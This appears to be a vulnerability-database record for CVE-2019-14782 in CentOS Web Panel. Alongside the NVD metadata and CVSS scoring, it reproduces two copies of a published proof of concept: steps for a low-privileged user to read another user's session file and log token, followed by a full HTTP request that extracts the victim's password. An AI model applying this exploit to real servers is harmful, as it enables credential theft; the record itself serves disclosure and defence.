{"id": "CVE-2019-14782", "bulletinFamily": "NVD", "title": "CVE-2019-14782", "description": "CentOS-WebPanel.com (aka CWP) CentOS Web Panel 0.9.8.856 through 0.9.8.864 allows an attacker to get a victim's session file name from the /tmp directory, and the victim's token value from /usr/local/cwpsrv/logs/access_log, then use them to make a request to extract the victim's password (for the OS and phpMyAdmin) via an attacker account.", "published": "2019-12-17T16:15:00", "modified": "2020-08-24T17:37:00", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2019-14782", "reporter": "cve@mitre.org", "references": ["https://packetstormsecurity.com/files/155676/Control-Web-Panel-0.9.8.864-phpMyAdmin-Password-Disclosure.html", "https://centos-webpanel.com/changelog-cwp7"], "cvelist": ["CVE-2019-14782"], "type": "cve", "lastseen": "2020-12-09T21:41:44", "edition": 8, "viewCount": 4, "enchantments": {"dependencies": {"references": [{"type": "zdt", "idList": ["1337DAY-ID-33664"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:155676"]}], "modified": "2020-12-09T21:41:44", "rev": 2}, "score": {"value": 4.5, "vector": "NONE", "modified": "2020-12-09T21:41:44", "rev": 2}, "vulnersScore": 4.5}, "cpe": ["cpe:/a:centos-webpanel:centos_web_panel:0.9.8.864"], "affectedSoftware": [{"cpeName": "centos-webpanel:centos_web_panel", "name": "centos-webpanel centos web panel", "operator": "le", "version": "0.9.8.864"}], "cvss2": {"acInsufInfo": false, "cvssV2": {"accessComplexity": "LOW", "accessVector": "NETWORK", "authentication": "SINGLE", "availabilityImpact": "NONE", "baseScore": 4.0, "confidentialityImpact": "PARTIAL", "integrityImpact": "NONE", "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0"}, "exploitabilityScore": 8.0, "impactScore": 2.9, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "obtainUserPrivilege": false, "severity": "MEDIUM", "userInteractionRequired": false}, "cvss3": {"cvssV3": {"attackComplexity": "LOW", "attackVector": "NETWORK", "availabilityImpact": "NONE", "baseScore": 6.5, "baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "privilegesRequired": "LOW", "scope": "UNCHANGED", "userInteraction": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "version": "3.1"}, "exploitabilityScore": 2.8, "impactScore": 3.6}, "cpe23": ["cpe:2.3:a:centos-webpanel:centos_web_panel:0.9.8.864:*:*:*:*:*:*:*"], "cwe": ["CWE-532"], "scheme": null, "cpeConfiguration": {"CVE_data_version": "4.0", "nodes": [{"cpe_match": [{"cpe23Uri": "cpe:2.3:a:centos-webpanel:centos_web_panel:0.9.8.864:*:*:*:*:*:*:*", "versionEndIncluding": "0.9.8.864", "versionStartIncluding": "0.9.8.856", "vulnerable": true}], "operator": "OR"}]}}

{"packetstorm": [{"lastseen": "2019-12-16T22:59:54", "description": "", "published": "2019-12-16T00:00:00", "type": "packetstorm", "title": "Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14782", "CVE-2019-15235"], "modified": "2019-12-16T00:00:00", "id": "PACKETSTORM:155676", "href": "https://packetstormsecurity.com/files/155676/Control-Web-Panel-0.9.8.864-phpMyAdmin-Password-Disclosure.html", "sourceData": "`Exploit Title : CWP (Control Web Panel) phpMyAdmin password access \nDate : 20 Aug 2019 \nExploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak \nVendor Homepage : https://control-webpanel.com/ \nSoftware Link : Not available, user panel only available for lastest version \nVersion : 0.9.8.856 - 0.9.8.864 \nTested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit) \nCVE-Number : CVE-2019-14782, CVE-2019-15235 \nReference : N/A \n \n1. Login as an low privileged user \n2. Get Session file name from path \"/tmp\" or /home/[USERNAME]/tmp/session/sess_xxxxxx\" \n3. Get token value from \"/usr/local/cwpsrv/logs/access_log\" \n4. Make a request to obtain target password \n \nGET /cwp_[token]/victim?module=pma HTTP/1.1 \nHost: 192.168.1.1:2083 \nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0 \nAccept: */* \nAccept-Language: en-US,en;q=0.5 \nConnection: close \nReferer: https://192.168.1.1:2083/ \nCookie: PHPSESSID=[sess_xxxxxx] \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/155676/cwpphpmyadmin-disclose.txt"}], "zdt": [{"lastseen": "2019-12-17T17:13:40", "description": "Exploit for php platform in category web applications", "edition": 1, "published": "2019-12-17T00:00:00", "title": "Control Web Panel 0.9.8.864 phpMyAdmin Password Disclosure Vulnerability", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-14782", "CVE-2019-15235"], "modified": "2019-12-17T00:00:00", "id": "1337DAY-ID-33664", "href": "https://0day.today/exploit/description/33664", "sourceData": "Exploit Title : CWP (Control Web Panel) phpMyAdmin password access\r\nExploit Author : Pongtorn Angsuchotmetee, Nissana Sirijirakal, Narin Boonwasanarak\r\nVendor Homepage : https://control-webpanel.com/\r\nSoftware Link : Not available, user panel only available for lastest version\r\nVersion : 0.9.8.856 - 0.9.8.864 \r\nTested on : CentOS 7.6.1810 (Core) FireFox 68.0.1 (64-bit)\r\nCVE-Number : CVE-2019-14782, CVE-2019-15235\r\nReference : N/A\r\n\r\n1. Login as an low privileged user\r\n2. Get Session file name from path \"/tmp\" or /home/[USERNAME]/tmp/session/sess_xxxxxx\"\r\n3. Get token value from \"/usr/local/cwpsrv/logs/access_log\"\r\n4. Make a request to obtain target password\r\n\r\nGET /cwp_[token]/victim?module=pma HTTP/1.1\r\nHost: 192.168.1.1:2083\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:68.0) Gecko/20100101 Firefox/68.0\r\nAccept: */*\r\nAccept-Language: en-US,en;q=0.5\r\nConnection: close\r\nReferer: https://192.168.1.1:2083/\r\nCookie: PHPSESSID=[sess_xxxxxx]\n\n# 0day.today [2019-12-17] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/33664"}]}